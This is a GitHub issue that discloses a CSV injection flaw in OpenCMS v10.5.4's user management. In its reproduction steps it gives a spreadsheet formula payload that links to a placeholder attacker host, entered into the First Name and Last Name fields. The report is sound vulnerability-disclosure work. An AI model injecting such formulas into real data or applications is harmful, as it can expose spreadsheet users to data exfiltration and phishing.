Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSV Injection | v10.5.4 | New User #636

Open
varchashva opened this issue Apr 8, 2019 · 0 comments

Comments

Projects
None yet
1 participant
@varchashva
Copy link

commented Apr 8, 2019

Hello Team,

I would like to report a vulnerability (CSV Injection) which I have observed in current version v10.5.4 and before.

When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:

  • Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524
  • Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website
  • Exfiltrating contents from the spreadsheet, or other open spreadsheets.

Please refer https://www.owasp.org/index.php/CSV_Injection for more details.

Impacted URL is http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Steps to reproduce:

  1. Browse to Quick Launch -> Account Management -> User Management -> New User
    Insert =HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe") in First Name and Last Name field

open_cms_user_csvi_1

  1. Now export all user information in CSV by using export feature in application.
    Quick Launch -> Account Management -> User Management -> Export User
  2. Once user opens the affected CSV file, payload will be triggered

open_cms_user_csvi_2

open_cms_user_csvi_3

Version Details:

opencms_user_xss_3

Best Regards
https://github.com/varchashva
varchashva [at] gmail [dot] com

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.